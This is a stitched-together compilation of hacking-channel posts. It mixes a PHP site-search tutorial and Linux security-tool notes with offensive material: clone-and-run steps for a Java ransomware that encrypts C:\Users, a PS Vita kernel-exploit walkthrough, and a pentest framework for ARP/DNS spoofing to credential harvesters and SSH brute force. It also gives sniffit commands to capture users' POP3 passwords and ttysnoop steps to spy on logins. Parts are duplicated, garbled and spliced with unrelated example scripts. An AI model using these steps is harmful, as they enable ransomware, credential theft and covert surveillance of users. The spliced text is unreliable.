🦑 Part 2 - Build your own site search engine
This way, if the keyword entered by the visitor is empty, a prompt can be shown. Next, we iterate through all the files.
1) We can iterate through all the files recursively, using the functions opendir and readdir, or the PHP Directory class. Here we use the former.
<?php
// Function to traverse all files
function listFiles($dir) {
    $handle = opendir($dir);
    while (false !== ($file = readdir($handle))) {
        if ($file != "." && $file != "..") {
            // If it is a directory, continue searching
            if (is_dir("$dir/$file")) {
                listFiles("$dir/$file");
            } else {
                // Process it here
            }
        }
    }
    // Release the directory handle once the directory has been read
    closedir($handle);
}
?>
2) At the marked place (the "Process it here" comment), we can read and process each file that is found. The code below reads the content of the file and checks whether it contains the keyword $keyword; if it does, the file's path is added to an array.
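<?php
// $dir is the search directory, $keyword is the search keyword, and $array is the array that stores the results
function listFiles($dir, $keyword, &$array) {
    $handle = opendir($dir);
    while (false !== ($file = readdir($handle))) {
        if ($file != "." && $file != "..") {
            if (is_dir("$dir/$file")) {
                listFiles("$dir/$file", $keyword, $array);
            } else {
                // Skip the search script itself
                if ($file != "search.php") {
                    // Read the whole file; unlike fread() with filesize(), this also copes with empty files
                    $data = file_get_contents("$dir/$file");
                    // If the content contains the keyword, store the file's path
                    if ($data !== false && strpos($data, $keyword) !== false) {
                        $array[] = "$dir/$file";
                    }
                }
            }
        }
    }
    closedir($handle);
}
?>
Now combine this result with the program at the beginning, enter a keyword, and you will find that relevant results in your website are searched out. We are perfecting it now.
Note that this function reads every file under $dir, configuration files and PHP sources included, so point it only at a directory of public content and escape the paths before printing them.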
Written by UndercOde
🦑 Automate the process and invoke extensions to block additional sites by category.
> Extending and consolidating hosts files from several well-curated sources like adaway.org, mvps.org, malwaredomainlist.com, someonewhocares.org, and potentially others. You can optionally
🦑 INSTALLATION & RUN:
1) git clone https://github.com/StevenBlack/hosts
2) cd hosts
3) pip3 install --user -r requirements.txt
4) python3 updateHostsFile.py [--auto] [--replace] [--ip nnn.nnn.nnn.nnn] [--extensions ext1 ext2 ext3]
🦑 Commands:
--help, or -h: display help.
--auto, or -a: run the script without prompting. When --auto is invoked:
> Hosts data sources, including extensions, are updated.
> No extensions are included by default. Use the --extensions or -e flag to include any you want.
> Your active hosts file is not replaced unless you include the --replace flag.
--backup, or -b: Make a backup of existing hosts file(s) as you generate over them.
--extensions <ext1> <ext2> <ext3>, or -e <ext1> <ext2> <ext3>: the names of subfolders below the extensions folder containing additional category-specific hosts files to include in the amalgamation. Example: --extensions porn or -e social porn.
--flush-dns-cache, or -f: skip the prompt for flushing the DNS cache. Only active when --replace is also active.
--ip nnn.nnn.nnn.nnn, or -i nnn.nnn.nnn.nnn: the IP address to use as the target. Default is 0.0.0.0.
--keepdomaincomments, or -k: true (default) or false, keep the comments that appear on the same line as domains. The default is true.
--noupdate, or -n: skip fetching updates from hosts data sources.
--output <subfolder>, or -o <subfolder>: place the generated source file in a subfolder. If the subfolder does not exist, it will be created.
--replace, or -r: trigger replacing your active hosts
--skipstatichosts, or -s: false (default) or true, omit the standard section at the top, containing lines like 127.0.0.1 localhost. This is useful for configuring proximate DNS services on the local network.
--compress, or -c: false (default) or true, Compress the hosts file ignoring non-necessary lines (empty lines and comments) and putting multiple domains in each line. Reducing the number of lines of the hosts file improves the performances under Windows (with DNS Client service enabled).
--minimise, or -m: false (default) or true, like --compress, but puts each domain on a separate line. This is necessary because many implementations of URL blockers that rely on hosts files do not conform to the standard which allows multiple hosts on a single line.
Written by UndercOde
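A check worth running on the generated file before using --replace, shown as an added example (it is not part of the StevenBlack/hosts project or of the original post): it parses hosts-format text, reports every entry that points a name at an address other than a blocking sink, and re-emits the block list with one domain per line or several per line, the two shapes the --minimise and --compress descriptions refer to. The sample input, the function names and the list of static names are assumptions made for this example.

```python
"""Audit a merged hosts file before it replaces the active one (added example)."""
import ipaddress

# Addresses that make a hosts entry a block: the name resolves to nowhere useful.
SINK_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::", "::1"}

# Names that belong to the static section at the top of a hosts file
# (the part --skipstatichosts omits). Assumed list for this example.
STATIC_NAMES = {
    "localhost", "localhost.localdomain", "local", "broadcasthost",
    "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters",
}

# Constructed sample input, not data from any real list.
SAMPLE = """\
# constructed sample
127.0.0.1 localhost
::1 ip6-localhost ip6-loopback
0.0.0.0 ads.example.com   # ad server
0.0.0.0 tracker.example.net ads.example.com
127.0.0.1 Metrics.Example.org
203.0.113.7 login.example-bank.test
0.0.0.0
999.1.1.1 broken.example.com
"""


def parse_hosts(text):
    """Yield (line_no, ip, names) per entry; ip is None for malformed lines."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            yield line_no, None, fields      # address without a name
            continue
        # several names per line are legal (the compressed layout)
        yield line_no, fields[0], [name.lower() for name in fields[1:]]


def audit(text):
    """Return (blocked, findings).

    blocked  -- sorted, de-duplicated names mapped to a sink address
    findings -- (line_no, reason) for every entry that is not a plain block
    """
    blocked, findings = set(), []
    for line_no, ip, names in parse_hosts(text):
        if ip is None:
            findings.append((line_no, "malformed entry: %r" % (names,)))
            continue
        try:
            addr = str(ipaddress.ip_address(ip))
        except ValueError:
            findings.append((line_no, "invalid address %r" % ip))
            continue
        for name in names:
            if name in STATIC_NAMES:
                continue
            if addr in SINK_ADDRESSES:
                blocked.add(name)
            else:
                # A list entry that sends a name to a routable address is a
                # redirect, not a block, and should never reach the live file.
                findings.append((line_no, "%s redirected to %s" % (name, addr)))
    return sorted(blocked), findings


def render(domains, sink="0.0.0.0", per_line=1):
    """Emit hosts lines; per_line=1 is one domain per line, >1 packs names."""
    chunks = (domains[i:i + per_line] for i in range(0, len(domains), per_line))
    return "".join("%s %s\n" % (sink, " ".join(chunk)) for chunk in chunks)


if __name__ == "__main__":
    blocked, findings = audit(SAMPLE)
    for line_no, reason in findings:
        print("line %d: %s" % (line_no, reason))
    print(render(blocked, per_line=3), end="")
```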
🦑 JavaRansomware
Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's data. Ransomware stops you from using your PC. It spreads through e-mail attachments, infected programs and compromised websites. A ransomware program may also be called a cryptovirus, cryptotrojan or cryptoworm. It holds your PC or files for "ransom".
🦑 FEATURES:
Ransomware can:
1) Prevent you from accessing Windows.
2) Encrypt files so you can't use them.
3) Stop certain apps from running (like your web browser).
4) Ransomware will demand that you pay money (a "ransom") to get access to your PC or files. We have also seen them make you complete surveys.
5) There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.
🦑 INSTALLATION & RUN:
1) git clone https://github.com/PanagiotisDrakatos/JavaRansomware
2) $ cd JarPath
Encrypt All Files in the Current Path wait until the execution will be finished
3) $ java -jar JavaRansomware.jar C:\Users Encrypt
Decrypt All Files in the Current Path wait until the execution will be finished
4) $ java -jar JavaRansomware.jar C:\Users Decrypt
Written by UndercOde
🦑 Updated: fully chained kernel exploit for the PS Vita on firmwares 3.65-3.68
🦑 Requirements
1) Your device must be on firmware 3.65, 3.67 or 3.68. Firmware 3.69 and higher are not supported. If you're on a lower firmware, please decide carefully which firmware you want to update to, then search for a trustworthy guide on /r/vitahacks.
2) If your device is a phat OLED model, you need a Memory Card in order to install. There's no need for a Memory Card on Slim/PS TV models, since they already provide an Internal Storage. Make sure you have got at least 270 MB of free space.
3) Your device must be linked to any PSN account (it doesn't need to be activated though). If it is not, then you must restore default settings in order to sign in.
🦑 INSTALLATION & RUN:
1) Download https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/h-encore.zip
> Extract it.
2) Download and install qcma, psvimgtools and pkg2zip (check the releases section for the binaries).
If you don't know where to put the psvimgtools and pkg2zip binaries, just put them in the h-encore folder.
> https://codestation.github.io/qcma/
> https://github.com/yifanlu/psvimgtools
> https://github.com/mmozeiko/pkg2zip
3) Download the vulnerable DRM-free demo of bitter smile (yes, that's the user entry point).
> http://ares.dl.playstation.net/cdn/JP0741/PCSG90096_00/xGMrXOkORxWRyqzLMihZPqsXAbAXLzvAdJFqtPJLAZTgOcqJobxQAhLNbgiFydVlcmVOrpZKklOYxizQCRpiLfjeROuWivGXfwgkq.pkg
4) Extract the demo using this command in terminal/cmd:
pkg2zip -x PATH_OF_PKG
This will output the files to app/PCSG90096.
5) Copy the contents of the output app/PCSG90096 to the folder h-encore/app/ux0_temp_game_PCSG90096_app_PCSG90096 (such that the files eboot.bin and VITA_PATH.TXT are within the same folder).
6) Copy the license file app/PCSG90096/sce_sys/package/temp.bin to the folder h-encore/license/ux0_temp_game_PCSG90096_license_app_PCSG90096 and rename the just-pasted file temp.bin to 6488b73b912a753a492e2714e9b38bc7.rif. Be careful with the file extension: it should not be .rif.bin. Again, this file should be in the same folder as VITA_PATH.TXT.
7) Start qcma and, within the qcma settings, set the option "Use this version for updates" to "FW 0.00 (Always up-to-date)" to spoof the System Software check.
8) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PC -> PS Vita System, and after that select Applications. If you see an error message about System Software, simply reboot your device to solve it (if this doesn't solve it, put your device into airplane mode and reboot). If this still does not work, alternatively set DNS to 212.47.229.76 to block updates. This should create a folder at PS Vita/APP/xxxxxxxxxxxxxxxx on your computer (see the qcma settings for where this folder is), where the folder xxxxxxxxxxxxxxxx represents the AID (account ID that is 16 characters long) that you need to insert here. If the AID is valid, it will yield a key that you can now use to encrypt the demo.
9) Change directory to the h-encore folder in terminal/cmd and use the key to encrypt all folders using (make sure you don't confuse the key with the AID, the key is 64 characters long!):
psvimg-create -n app -K YOUR_KEY app PCSG90096/app
psvimg-create -n appmeta -K YOUR_KEY appmeta PCSG90096/appmeta
psvimg-create -n license -K YOUR_KEY license PCSG90096/license
psvimg-create -n savedata -K YOUR_KEY savedata PCSG90096/savedata
10) The folder h-encore/PCSG90096 should then contain sce_sys and all 4 folders from above, and within these folders you should find files called X.psvimg and X.psvmd, where X has the same name as the folder. Backup this folder, since if everything has been done correctly, you don't need to redo all the steps to install it onto another device with the same PSN account.
11) Copy the folder h-encore/PCSG90096 to PS Vita/APP/xxxxxxxxxxxxxxxx/PCSG90096 and then select Refresh database in qcma.
The h-encore bubble with a size of around 243 MB should now appear in the Content Manager and that's what you finally need to transfer to your PS Vita. If the size does not match or you get the error C2-12858-4, then it's because you did not do it correctly! Please re-read the instructions more carefully then. If you get the error You can only copy applications that your account is the owner of, then it's because you have used an AID that is not of your account, go back to step 8.
12) Launch h-encore to exploit your device (if a message about trophies appears, simply click yes). The screen should first flash white, then purple, and finally open a menu called h-encore bootstrap menu where you can download VitaShell and install HENkaku. If it prompts the error Cannot start this application. C0-11136-2, then it's because you did not do step 6. correctly.
> Note that you have to relaunch the exploit every time you reboot or shut down your device. Of course, if you only put your device into standby mode, you don't need to relaunch.
🦑 Tested by UndercOde
🦑 Updated penetration testing framework:
🦑 Features:
1) ARP spoofing - Man-in-the-middle.
2) ARP+DNS spoof - fake page redirect to credential harvester
3) DHCP ACK Injection spoofing - Man-in-the-middle
4) Man-in-the-middle inject BeEF hook
5) SSH Brute-Force attack.
6) Web page formulary brute-force
7) URL content buster
8) Overthrow the DNS of LAN range/IP address
9) Redirect all possible DNS queries to host
10) Get Shellcode from binary
11) Filter strings on pcap files
12) Exploit Development 1: Overwriting Instruction Pointer
13) Exploit Development 2: Ret2libc
🦑 INSTALLATION & RUN:
1) sudo apt-get update
2) sudo apt-get install -y build-essential python-dev python-pip tcpdump python-capstone \
   libnetfilter-queue-dev libffi-dev libssl-dev
🦑 With pip:
> sudo pip install pythem
With source and pip:
1) git clone https://github.com/m4n3dw0lf/pythem
2) cd pythem
3) sudo python setup.py sdist
4) sudo pip install dist/*
🦑 Running
1) Call on a terminal (requires root privileges):
$ sudo pythem
2) Running as a Docker container (requires Docker):
docker run -it --net=host --rm --name pythem m4n3dw0lf/pythem
Written by UndercOde
🦑 How to evaluate OS security, in full, by UnderCode:
🦑 LET'S START:
1) With the development of networks, enterprises are connecting their local area networks into wide area networks, or their internal networks to the Internet. This gives more and more people (internal and external) the opportunity to access internal network resources. As a result of this exposure, companies urgently need to address cybersecurity issues.
2) A major part of providing effective security is assessing how well the existing security mechanisms are integrated with the company's network security policies, that is, determining whether the security policies are effectively implemented. The increasing complexity of the network makes it more and more difficult to implement security policies.
3) Assessing the effectiveness of each network security component is necessary to ensure effective network security. The two main components that provide network security are the firewall and the operating system (OS).
4) Many companies focus their efforts on firewalls, and according to reports provided by the Aberdeen Group, the most vulnerable security holes are those that exist in the operating environment. Some vendors are committed to providing a reliable version of the operating environment, while most offer only optional, installable security services.
5) The security mechanism of the operating system helps protect the machine running the OS from unauthorized access. Special protection is given against unauthorized access to specific information within the machine, specific machine instructions, and UNIX superuser instructions. Most firewalls, and the Internet itself, are built on a standard, unsecured UNIX operating environment. This is why no one is surprised by the existence of security threats. UNIX is very insecure, it is difficult to configure, and configuration errors can lead to vulnerabilities.
🦑 The following two factors make the OS security mechanism very important:
1) It provides a second line of defense behind the firewall. Hackers often break through or bypass firewalls, and OS security policies can effectively protect the system against such intruders.
2) It defends against intruders inside the enterprise. Internal intruders are already inside the firewall, and FBI reports indicate that more than 60% of computer crimes originate from within the enterprise. In most cases, the offenders are angry employees or contractors.
Written by UndercOde
🦑 Assessing OS security is quite difficult, especially for UNIX, because it has many variants and vendors. Assessing the security of a UNIX system requires proficiency in the following three areas:
🦑 LET'S START:
1) Setting up a UNIX system
2) Weaknesses brought by various versions of UNIX applications, including sendmail, FTP, NFS (Network File System) and TFTP (Trivial File Transfer Protocol)
3) Security patches
The operating system is constantly being patched for bugs and gaining features, which complicates assessments, and these updates introduce new security vulnerabilities. What is needed is a way to automatically assess operating system vulnerabilities and automatically enforce security policies. Only in this way can the gap between security policy and security enforcement be effectively assessed and closed.
4) OS security scanning software provides exactly the required solution. Scanning software runs on each machine and probes it through a series of tests to unearth potential weaknesses. This software evaluates the stand-alone security environment from an operating system perspective, generates a detailed report of the vulnerabilities it finds, and proposes solutions.
5) System Security Scanner (S3) from ISS is a security assessment tool that facilitates the management and implementation of security policies. It enables enterprises to implement security policies across heterogeneous operating platforms. Currently, S3 supports most popular UNIX versions, including Linux, SunOS 4.1.3, Solaris, HP-UX, and AIX. It helps companies automate security assessments and maintenance on their operating system platforms. With this effective tool, companies can use the full potential of their networks to continuously increase their competitiveness, without having to worry about security.
Written by UndercOde
π¦ Assessing OS security is quite difficult, especially for UNIX, because it has many variants and vendors. Assessing the security of a UNIX system requires proficiency in the following three areas:
instagram.com/UnderCodeTestingCompany
π¦LETS START:
1) setting up a UNIX system
2) Weaknesses brought by various versions of UNIX applications, including sending mail, FTP, NFS (Network File System) and TFTP (Simple File Transfer Protocol)
3) Security Patches-The
operating system is constantly patching BUGS and adding features to complicate assessments, and these updates introduce new security vulnerabilities. What is needed is a way to automatically assess operating system vulnerabilities and automatically enforce security policies. Only in this way can the gap between security policy and security enforcement be effectively assessed and closed.
4) The OS security scan file provides exactly the required solution. Scanning software runs on each machine and probes each machine through a series of tests to unearth potential weaknesses. This software evaluates the stand-alone security environment from an operating system perspective and generates a detailed report of the vulnerabilities it finds and proposes solutions.
5) System Security Scanner (S3) from ISS is a security assessment tool that facilitates the management and implementation of security policies. It enables enterprises to implement security policies across heterogeneous operating platforms. Currently, S3 supports most popular UNIX versions, including Linux, SunOS 4.1.3, Solaris, HP-UX, and AIX. It helps companies automate security assessments and maintenance on their operating system platforms. With this effective tool, companies can use the full potential of their networks to continuously increase their competitivenessβwithout having to worry about security.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Introduction to common Linux network security tools by UnderCode
pinterest.com/UnderCodeOfficial
LET'S START:
1) Although the various Linux distributions come with a lot of free open-source software, a large number of useful tools are still not included by default on their installation CDs, in particular some toolkits that can enhance Linux network security. Most of them are also open-source free software.
Here is a brief introduction to several tools that enhance Linux network security.
1) sudo
sudo is a program used by system administrators to allow some users to run some or all system commands as root. An obvious use is to enhance the security of the site. If you need to do some work as root every day and often execute a fixed set of commands that only root can run, then sudo is very suitable for you.
sudo's homepage is at: http://www.courtesan.com/courtesan/products/sudo/
2) Taking Redhat as an example, the installation and setup process is as follows:
3) First, you can download the rpm package for Redhat Linux from the sudo homepage.
It is at ftp://ftp.freshmeat.net/pub/rpms/sudo/ and the latest stable version is currently 1.5.9p4.
4) Execute # rpm -ivh sudo* to install it, then edit the /etc/sudoers file with /usr/sbin/visudo.
5) If you are told that /usr/bin/vi cannot be found although the vi program exists in /bin, run
ln -sf /bin/vi /usr/bin/vi to create a symbolic link for vi under /usr/bin. (Note: I encountered this on Redhat 6.1, and this problem does not exist on Redhat 5.x)
6) In addition, if some other error occurs, you may also need # chmod 700 /var/run/sudo
Below is my /etc/sudoers example file:
[root@sh-proxy /etc]# more sudoers
Host_Alias SERVER = sh-proxy
# User alias specification
User_Alias ADMIN = jephe, tome
# Cmnd alias specification
Cmnd_Alias SHUTDOWN = /etc/halt, /etc/shutdown, /etc/reboot
ADMIN SERVER = SHUTDOWN
jephe SERVER = /usr/bin/tail -f /var/log/maillog
jephe SERVER = /usr/bin/tail -f /var/log/messages
# User privilege specification
root ALL = (ALL) ALL
-----------
1) Since I often need to log in to the server remotely to observe the changes in the email log file /var/log/maillog, I added this line to /etc/sudoers so that I don't need to log in as root to complete my daily work, which improves safety.
2) Sniffit
Sniffit is a well-known network port probe. You can configure it to run in the background to detect which TCP/IP ports the user's input/output information is on.
3) Its most commonly used function is that an attacker can use it to watch the data transferred on your ports 23 (telnet) and 110 (pop3) and easily get your login password and mail account password. Sniffit is basically a tool used by vandals, but if you want to know how to enhance the security of your site, you should first know the various tools used by intruders.
4) sniffit's homepage is at http://reptile.rug.ac.be/~coder/sniffit/sniffit.html and you can download the latest version from there. Installation is very easy: just run # tar xvfz sniff* in the root directory to extract all files to the corresponding directory.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Linux Network-Tools PART 2:
> You can run sniffit -i to view, in an interactive graphical interface, all input/output information on the specified network interface.
LET'S START:
1) For example: in order to get the pop3 account and password that all users enter when receiving mail through an interface abcd, you can run
# sniffit -p 110 -t abcd &
# sniffit -p 110 -s abcd &
The log files are written below the directory /usr/doc/sniffit*:
2) The log file is named according to the visitor's IP address, a random high port number, and the IP address of the network interface and the port being monitored. It takes advantage of an inherent weakness of the TCP/IP protocols: the username and password sent by ordinary telnet and pop3 travel in plain text, without any encryption. So instead of telnet/ftp you can use ssh/scp. The ssh/scp traffic captured by sniffit is basically a bunch of garbled characters, so you don't need to worry about the username and password sent over ssh being stolen by a third party.
3) ttysnoop(s)
ttysnoop is a program that redirects all input/output of one terminal to another terminal. At present, the website I know of is http://uscan.cjb.net , but I can't connect to it all the time. I got ttysnoop-0.12c-5 from other channels, and the address is http://rpmfind.net/linux/RPM/contrib/libc6/i386/ttysnoop-0.12c-5.i386.html This version does not seem to support shadow passwords. After installation, you need to manually create the directory /var/spool/ttysnoop. Testing this program is interesting; the relevant instructions follow:
4) First change the in.telnetd entry in /etc/inetd.conf so that it calls /sbin/ttysnoops instead of the default login program, as follows:
[root@jephe /etc]# more inetd.conf | grep in.telnetd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -L /sbin/ttysnoops
5) Be sure to run killall -HUP inetd after the change to make it effective. Make sure not to use shadow passwords; use # pwunconv to disable them. Note that pwunconv moves the password hashes back into the world-readable /etc/passwd.
Then edit the file /etc/snooptab; the default configuration is enough.
[root@jephe /etc]# more snooptab
ttyS1 /dev/tty7 login /bin/login
ttyS2 /dev/tty8 login /bin/login
* socket login /bin/login
------
6) Finally, if someone has logged in on a terminal (you can use the w command to see which terminal it is) and the terminal device is ttyp0, you can log in to the server and type # /bin/ttysnoop ttyp0 (it prompts for the root password; again, the version mentioned above does not support shadow passwords) to monitor the user's login window.
nmap
nmap is a tool used to perform port scanning on a relatively large network. It can detect which TCP/IP ports are currently open on the server. You can run it to ensure that unsafe ports that should not be open are blocked.
nmap's homepage is at http://www.insecure.org/nmap/index.html and a simple example follows:
[root@sh-proxy /etc]# /usr/local/bin/nmap public.sta.net.cn
Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on public.sta.net.cn (202.96.199.97):
Port    State       Protocol  Service
21      open        tcp       ftp
23      open        tcp       telnet
25      open        tcp       smtp
109     open        tcp       pop-2
110     open        tcp       pop-3
143     open        tcp       imap2
513     open        tcp       login
514     open        tcp       shell
7000    open        tcp       afs3-fileserver
Nmap run completed -- 1 IP address (1 host up) scanned in 15 seconds
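To use a listing like the one above for the check the text describes (making sure ports that should not be open are closed), it can be compared against an allowlist. The script below is an added example, not part of the original post; the allowlist and the function names are assumptions, and the embedded listing is the scan output shown above.

```shell
#!/bin/sh
# Added example: compare an nmap 2.x style port listing with an allowlist.
# ALLOWED_PORTS and all function names are assumptions made for this sketch.

ALLOWED_PORTS="25 110"   # hypothetical policy: only smtp and pop-3 may be open

# The listing from the post, embedded so the example runs offline.
sample_scan() {
cat <<'EOF'
Interesting ports on public.sta.net.cn (202.96.199.97):
Port    State       Protocol  Service
21      open        tcp       ftp
23      open        tcp       telnet
25      open        tcp       smtp
109     open        tcp       pop-2
110     open        tcp       pop-3
143     open        tcp       imap2
513     open        tcp       login
514     open        tcp       shell
7000    open        tcp       afs3-fileserver
EOF
}

# Print "port/proto service" for every open port in the listing on stdin.
open_ports() {
    awk '$1 ~ /^[0-9]+$/ && $2 == "open" { print $1 "/" $3, $4 }'
}

# Print only the open ports that are missing from the allowlist passed as $1.
unexpected_ports() {
    allowed=" $1 "
    open_ports | while read -r portproto service; do
        port=${portproto%%/*}
        case "$allowed" in
            *" $port "*) ;;                  # permitted by policy
            *) echo "$portproto $service" ;;
        esac
    done
}

# Return 0 when the listing on stdin matches the policy in $1, 1 otherwise.
audit_scan() {
    findings=$(unexpected_ports "$1")
    if [ -n "$findings" ]; then
        echo "Unexpected open ports:"
        echo "$findings"
        return 1
    fi
    echo "Only allowed ports are open."
    return 0
}

if sample_scan | audit_scan "$ALLOWED_PORTS"; then
    :
else
    echo "Policy check failed: close or filter the services listed above."
fi
```

Run from cron against a saved scan of your own hosts, the non-zero return of audit_scan is what raises the alert.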
John the ripper
1) In Linux, passwords are stored in hashed form. You cannot work backwards from the hash data to the password, but you can hash a set of words and compare the results; if a hash matches, the password has been guessed. Therefore, it is critical to have a password that is difficult to guess. In general you must not use a dictionary word as a password, because it is quite easy to guess. In addition, common regular alphanumeric sequences such as 123abc must not be used as passwords either.
2) John the ripper is an efficient and easy-to-use password guessing program. http://www.openwall.com/john/
Download the tar.gz format program for UNIX, and then use tar xvfz john*.tar.gz to extract it to any directory. After entering the src directory and typing make linux-x86-any-elf (I use redhat 6.1), several executables will be generated in the run directory, including the main program john. Now run ./john /etc/passwd to crack the passwords.
> John can also crack the passwords that htpasswd generates for Apache user authentication. If you create a user named user with htpasswd -c apachepasswd user and generate a password, you can also use john apachepasswd to guess it. John prints each password it guesses to the terminal and stores the guessed passwords in the john.pot file.
Another password cracker is the classic Cracker that everyone knows. The homepage is at http://www.users.dircon.co.uk/~crypto/
II. Logcheck
1) Logcheck is a tool that automatically checks for system security intrusion events and records of abnormal activity. It analyzes various Linux log files, such as /var/log/messages, /var/log/secure and /var/log/maillog, then generates a report of possible security problems and automatically emails it to the administrator. You can set it to run hourly or daily with crond.
2) The homepage of the logcheck tool is at http://www.psionic.com/abacus/logcheck/ After downloading, use tar xvfz logcheck* to extract it to a temporary directory such as /tmp, and then use make linux to automatically install the corresponding files to /usr/local/etc, /usr/local/bin/ and other directories. You can change settings such as which account the email notifications are sent to; by default they go to root. You can set root's email alias to a group of people. You can also change the settings to ignore certain types of messages, such as those from plug-gw in your mail log file. Because plug-gw does a reverse IP lookup, it logs a warning message to /var/log/maillog whenever the lookup fails. By default logcheck reports all these warnings to you; you can ignore them through the settings.
3) Using the logcheck tool to analyze all your logfiles avoids you having to manually check them daily, saving time and improving efficiency.
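The reporting model described above (report whatever is new in the log, drop the messages you chose to ignore, and flag the known-bad ones) can be sketched in a few lines of shell. This is an added example and not logcheck's own code; the patterns, function names and log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: a logcheck-style pass over one log file.
# Patterns, names and sample log lines are assumptions made for this sketch.

VIOLATION_RE='FAILED LOGIN|authentication failure|refused connect'
IGNORE_RE='plug-gw\[[0-9]+\]: warning: reverse lookup failed'

# Print the lines appended to log $1 since the previous run. The number of
# lines already reported is remembered in state file $2.
new_lines() {
    log=$1
    state=$2
    seen=0
    if [ -f "$state" ]; then
        seen=$(cat "$state")
    fi
    total=$(wc -l < "$log" | tr -d ' ')
    # A file shorter than last time means the log was rotated: start over.
    if [ "$total" -lt "$seen" ]; then
        seen=0
    fi
    tail -n +"$((seen + 1))" "$log"
    echo "$total" > "$state"
}

# Read log lines on stdin, drop the ignored ones and label the rest.
classify() {
    grep -Ev "$IGNORE_RE" | while IFS= read -r line; do
        if printf '%s\n' "$line" | grep -Eq "$VIOLATION_RE"; then
            echo "VIOLATION: $line"
        else
            echo "UNUSUAL:   $line"
        fi
    done
}

# One scheduled run: report what is new and noteworthy in log $1.
logcheck_run() {
    new_lines "$1" "$2" | classify
}

demo_logcheck() {
    demo_dir=$(mktemp -d)
    demo_log=$demo_dir/maillog
    demo_state=$demo_dir/offset
    # Constructed log lines, not taken from a real system.
    cat > "$demo_log" <<'EOF'
Jan 10 01:00:01 sh-proxy plug-gw[812]: warning: reverse lookup failed for 10.0.0.7
Jan 10 01:02:13 sh-proxy login[901]: FAILED LOGIN 2 FROM 10.0.0.9 FOR root
Jan 10 01:05:40 sh-proxy sendmail[950]: unparsable header received
EOF
    echo "--- first run"
    logcheck_run "$demo_log" "$demo_state"
    echo 'Jan 10 02:00:00 sh-proxy in.telnetd[1001]: refused connect from 10.0.0.9' >> "$demo_log"
    echo "--- second run (only the new line is reported)"
    logcheck_run "$demo_log" "$demo_state"
    rm -rf "$demo_dir"
}

demo_logcheck
```

In a crontab entry the output of logcheck_run would be piped to mail for the administrator alias, and nothing is sent when the output is empty.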
III. Tripwire
4) Tripwire is a very useful tool for verifying file integrity. You can define which files and directories need to be checked, but the default settings meet most requirements. It runs in four modes: database generation, database update, file integrity check, and interactive database update. When the initial database is generated, it records various information about the existing files. If your system files or configuration files are accidentally changed, replaced, or deleted, the daily comparison of the existing files against the original database shows which files have been changed. You can judge from the emailed results whether there has been an unexpected event such as a system intrusion.
5) Tripwire's homepage is at http://www.tripwiresecurity.com , and you can use tripwire-1.2.3 for free. If you use Redhat Linux 6.1, you can also get the latest Tripwire-1.2.3 rebuilt for 6.1
(http://rufus.w3.org/linux/RPM/powertools/6.1/i386/tripwire-1.2-3.i386.html )
6) When you have manually changed a configuration file or program on the system, you can regenerate the database file by hand: run tripwire -initialize to create the databases directory under the current directory and generate a new system database file in it, then cp it to the /var/spool/tripwire directory to overwrite the old one.
Written by UndercOde
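The database generation, integrity check and database update cycle described in the Tripwire section can be illustrated with standard tools. The following is an added example, not Tripwire's code or database format; it records a SHA-256 hash and the permission string per file, and the function names and sample files are assumptions.

```shell
#!/bin/sh
# Added example: baseline / check / update in the style the post describes.
# This is not Tripwire's database format; all names here are assumptions.

hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Print one "path<TAB>sha256<TAB>mode" record per regular file under $1.
snapshot() {
    find "$1" -type f | sort | while IFS= read -r f; do
        sum=$(hash_file "$f")
        mode=$(ls -ld "$f" | awk '{print $1}')
        printf '%s\t%s\t%s\n' "$f" "$sum" "$mode"
    done
}

# Database generation (and, after a reviewed change, database update).
# Keep database $2 outside tree $1 and where an intruder cannot rewrite it.
db_init() {
    snapshot "$1" > "$2"
}

# Integrity check: print ADDED/CHANGED/REMOVED lines, return 1 on any finding.
db_check() {
    tree=$1
    db=$2
    cur=$(mktemp)
    snapshot "$tree" > "$cur"
    report=$(awk -F '\t' '
        FILENAME == ARGV[1] { base[$1] = $2 FS $3; next }   # the database
        {
            seen[$1] = 1
            if (!($1 in base))             print "ADDED   " $1
            else if (base[$1] != $2 FS $3) print "CHANGED " $1
        }
        END { for (p in base) if (!(p in seen)) print "REMOVED " p }
    ' "$db" "$cur" | sort)
    rm -f "$cur"
    if [ -n "$report" ]; then
        echo "$report"
        return 1
    fi
    return 0
}

demo_integrity() {
    work=$(mktemp -d)
    mkdir "$work/etc"
    # Constructed sample files standing in for real configuration files.
    echo "root ALL = (ALL) ALL" > "$work/etc/sudoers"
    echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd" > "$work/etc/inetd.conf"
    db_init "$work/etc" "$work/baseline.db"
    echo "# edited after the baseline" >> "$work/etc/inetd.conf"
    echo "unexpected" > "$work/etc/new.conf"
    if db_check "$work/etc" "$work/baseline.db"; then
        echo "No changes since the baseline."
    else
        echo "Review the changes above before updating the database."
    fi
    rm -rf "$work"
}

demo_integrity
```

Calling db_init again after a reviewed, intended change plays the role of the manual database regeneration in step 6.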
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
2020 The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security development, testing and reverse engineering:
T.me/UnderCodeTesting
LET'S START:
1) git clone https://github.com/OWASP/owasp-mstg/
2) cd owasp-mstg/Tools/
3) ./generate_document.sh
Clone the repository and run the gitbook generator. This produces PDF, Epub and Mobi files in the "Generated" subdirectory:
1) git clone https://github.com/OWASP/owasp-mstg/
2) cd owasp-mstg/Tools/
3) ./gitbookandpdf.sh
See more at the same git link.
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Automate DNS spoof - traffic hack:
